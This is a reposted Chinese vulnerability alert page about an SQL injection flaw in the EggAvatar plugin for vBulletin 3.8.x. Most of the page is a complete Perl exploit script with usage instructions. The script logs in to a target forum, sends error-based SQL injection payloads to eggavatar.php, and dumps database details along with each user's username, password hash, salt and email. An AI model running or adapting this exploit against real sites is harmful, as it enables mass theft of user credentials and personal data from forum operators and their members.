EggAvatar for vBulletin 3.8.x SQL注入漏洞漏洞预警 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【meiwen.anslib.com - 电脑资料】

   

    vBulletin是一款著名的商业论坛程序,vBulletin 3.8.x中的EggAvatar插件存在SQL注入漏洞,可能导致敏感信息泄露,

EggAvatar for vBulletin 3.8.x SQL注入漏洞漏洞预警

    [+]info:

    ~~~~~~~~~

    EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability

    [+]poc:

    ~~~~~~~~~

    view source

print?

    01#!/usr/bin/env perl

    02useLWP::UserAgent;

    03subbanner{

    04print"###################################\n";

    05print"############ DSecurity ############\n";

    06print"###################################\n";

    07print"# Email:dsecurity.vn[at]gmail.com #\n";

    08print"###################################\n";

    09}

    10if(@ARGV<5){

    11print"Usage: $0 address username password number_user sleeptime\n";

    12print"Example: $0 http://localhost/vbb test test 10 10\n";

    13exit();

    14}

    15$ua=LWP::UserAgent->new();

    16$ua->agent("DSecurity");

    17$ua->cookie_jar({});

    18sublogin(@){

    19my$username=shift;

    20my$password=shift;

    21my$req= HTTP::Request->new(POST =>$ARGV[0].'/login.php?do=login');

    22$req->content_type('application/x-www-form-urlencoded');

    23$req->content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login&vb_login_md5password=&vb_login_md5password_utf=");

    24my$res=$ua->request($req);

    25}

    26subv_request{

    27#Declare

    28$print=$_[0];

    29$select=$_[1];

    30$from=$_[2];

    31$where=$_[3];

    32$limit=$_[4];

    33$sleep=$ARGV[4];

    34if($fromeq'') {$from='information_schema.tables';}

    35if($whereeq'') {$where='1';}

    36if($limiteq'') {$limit='0';}

    37if($sleepeq'') {$sleep='10';}

    38

    39# Create a request

    40my$req= HTTP::Request->new(POST =>$ARGV[0].'/eggavatar.php');

    41$req->content_type('application/x-www-form-urlencoded');

    42$req->content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar=1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select $select from $from WHERE $where limit $limit,1),FLOOR(RAND(1)*3))foo FROM information_schema.tables GROUP BY foo)a)-- -'&uid=1&pid=1");

    43# Pass request to the user agent and get a response back

    44my$res=$ua->request($req);

    45#print $res->content;

    46if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)

    47{$test=$3};

    48sleep($sleep);

    49return$print.$test."\n";

    50}

    51&banner;

    52print"\n#############################################################################################################\n";

    53print"# EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability                                                #\n";

    54print"# Date:06-03-2011                                                                                          #\n";

    55print"# Author: DSecurity                                                                     #\n";

    56print"# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n";

    57print"# Version: 2.3.2                                                                                           #\n";

    58print"# Tested on: vBulletin 3.8.0                                                                               #\n";

    59print"#############################################################################################################\n";

    60

    61#login

    62login($ARGV[1],$ARGV[2]);

    63#Foot print

    64printv_request('MySQL version: ','@@version');

    65printv_request('Data dir: ','@@datadir');

    66printv_request('User: ','user()');

    67printv_request('Database: ','database()');

    68#Get user

    69for($i=1;$i<=$ARGV[3];$i++){

    70print"-----------------------------------------\n";

    71print$id= v_request('ID: ','userid','user','1',$i-1);

    72if($id=~ /(ID:)\s(.*)/){

    73printv_request('Group: ','usergroupid','user','userid='.$2);

    74printv_request('Username: ','username','user','userid='.$2);

    75printv_request('Password: ','password','user','userid='.$2);

    76printv_request('Salt: ','salt','user','userid='.$2);

    77printv_request('Email: ','email','user','userid='.$2);

    78}

    79

    80}

    [+]Reference:

    ~~~~~~~~~

    http://www.exploit-db.com/exploits/16934

最新文章